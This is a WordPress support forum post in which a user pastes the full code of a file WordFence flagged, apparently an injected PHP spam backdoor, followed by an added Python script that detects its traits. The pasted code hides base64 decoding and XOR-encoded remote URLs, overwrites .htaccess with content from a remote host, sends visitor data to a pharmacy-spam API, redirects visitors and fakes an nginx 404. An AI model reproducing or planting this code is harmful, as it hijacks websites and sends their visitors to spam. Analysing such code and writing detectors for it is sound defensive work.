Malware detection
Hey guys! I loooove Polylang and use it on multiple sites with excellent results. I have recently received a Malware warning from WordFence :
“Critical Problems:
* File appears to be malicious: wp-content/languages/img/lang.php
”
I looked over the code and didn’t find anything that jumped out at me, but I’m no expert. Could someone look at it? Thanks a million!

The code in the file is:
`<?php
error_reporting(0);
mb_internal_encoding(“UTF-8”);
$track = ‘lmdr’;
$res = $host = (isset($_SERVER[‘HTTPS’]) ? “https” : “http”) . “://$_SERVER[HTTP_HOST]”;
$tkey = $_GET[‘k’];
$key = str_replace(‘-‘, ‘ ‘, $tkey);
$cat = ”;
if (isset($_GET[‘check’])) {
echo ‘ok’;
die();
}
if (isset($_GET[‘gl’])) {
$htmls = glob(“htmls/*.html”);
foreach ($htmls as $html) {
$html = str_replace(‘htmls/’, ”, $html);
echo “$res/$html\n”;
}
die();
}
$ea = ‘_shaesx_’;
$ay = ‘get_html_ya’;
$ae = ‘decode’;
$ea = str_replace(‘_sha’, ‘bas’, $ea);
$ao = ‘wp_cd’;
$ee = $ea.$ae;
$oa = str_replace(‘sx’, ’64’, $ee);
$algo = ‘default’;
$pass = “Zgc5c4MXrLUufAwU6pFbfLCQOUKULbIckDuLX7HVoU4=”;
$gpass =”Zgc5c4MXrK0zfgkF8Y1BKercMlHBdrpelSSNA+7evRYSZwcBXAE=”;
function wp_cd($fd, $fa=””)
{
$fe = “wp_frmfunct”;
$len = strlen($fd);
$ff = ”;
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack(‘H*’, sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$api = $ao($oa(“$pass”), ‘wp_function’);
$genapi = $ao($oa(“$gpass”), ‘wp_function’);
if (isset($_GET[‘htaccess’])) {
$hres = str_replace(‘clgen.php’, ‘rpanel/htaccess.txt’, $genapi);
$htaccess = file_get_contents($hres);
chmod(“../../../.htaccess”, 0644);
if (file_put_contents(‘../../../.htaccess’, $htaccess)) {
echo ‘htaccess ok’;
die();
}
}
if (!file_exists(‘cats.txt’)) {
$cres = str_replace(‘clgen.php’, ‘img/cats.txt’, $genapi);
$cats = file_get_contents(“$cres”);
file_put_contents(‘cats.txt’, $cats);
}
$cats = file(‘cats.txt’, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($cats as $line) {
if (stristr($key, $line)) {
$cat = $line;
break;
}
}
//api redirect
$ip=$_SERVER[‘REMOTE_ADDR’];
$ua = $_SERVER[‘HTTP_USER_AGENT’];
$refer = $_SERVER[‘HTTP_REFERER’];
$scheme = ‘pharm’;
$ua1 = rawurlencode($ua);
$apikey = ‘5a087486b28b5953e8460fca6c4d168e’;
$churl = “{$api}action=get_link&api_key=$apikey&group=$scheme&cat=$cat&ua=$ua1&ip=$ip&keyword=$key&referer=$refer&track=$track”;
$check = file_get_contents($churl);
$json = json_decode($check);
$goaway = $json->{‘stream’}->{‘url’};
if ($goaway) {
echo “<script>location.href=\”$goaway\”;</script>”;
header(‘Location: ‘.$goaway);
//echo $goaway;
}
if (file_exists(“htmls/$tkey.html”)) {
$html = file_get_contents(“htmls/$tkey.html”);
}
elseif (isset($_GET[‘gen’])) {
if (!is_dir(“htmls”)) mkdir(“htmls”);
$rhtml = file_get_contents(“$genapi?res=$res&key=$key”);
if (file_put_contents(“htmls/$tkey.html”, $rhtml)) {
echo ‘gen ok’;
die();
}
}
if ($html) echo $html;
else echo ‘
<html>
<head><title>404 Not Found</title></head>
<body bgcolor=”white”>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
<!– a padding to disable MSIE and Chrome friendly error page –>
‘;
`
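
Added example, not part of the original post and not WordFence's detection logic: a small Python triage script that checks a PHP file for the constructs visible in the posted lang.php. The indicator list, the threshold and the sample strings are assumptions constructed for illustration.

```python
import re

# Straight or typographic quote: forum software often converts quotes in pasted code.
Q = "['\"\u2018\u2019\u201c\u201d]"

# (label, regex) pairs; each mirrors a construct visible in the posted lang.php.
INDICATORS = [
    ("errors suppressed", r"error_reporting\(\s*0\s*\)"),
    ("nested variable-function call", r"\$\w+\(\s*\$\w+\("),
    ("sha1 keystream XOR decoder", rf"pack\(\s*{Q}H\*{Q}\s*,\s*sha1\("),
    ("writes .htaccess", rf"file_put_contents\(\s*{Q}[^,]*\.htaccess"),
    ("redirect to remote-supplied URL", rf"header\(\s*{Q}Location:\s*{Q}\s*\.\s*\$"),
    ("forwards visitor IP and user agent", r"REMOTE_ADDR[\s\S]*HTTP_USER_AGENT"),
    ("fake nginx 404 body emitted by PHP", r"404 Not Found[\s\S]*<center>nginx</center>"),
]

def scan(php_source):
    """Return the labels of all indicators found in the given PHP source."""
    return [label for label, rx in INDICATORS if re.search(rx, php_source)]

def verdict(php_source, threshold=3):
    """Call a file suspicious when several independent indicators co-occur."""
    hits = scan(php_source)
    return ("suspicious" if len(hits) >= threshold else "inconclusive"), hits

# Constructed sample: a few lines shaped like the posted file, with straight quotes.
SAMPLE = r"""<?php
error_reporting(0);
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
$api = $ao($oa("$pass"), 'wp_function');
file_put_contents('../../../.htaccess', $htaccess);
header('Location: '.$goaway);
"""

# Constructed benign file: a fixed redirect and a local read should not trigger.
BENIGN = "<?php\nheader('Location: /login');\necho file_get_contents('readme.txt');\n"

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, verdict(src))
```

A single hit is weak evidence on its own; the point is the combination of a hidden decoder, a write to .htaccess and a redirect driven by a remote response in a file under wp-content/languages.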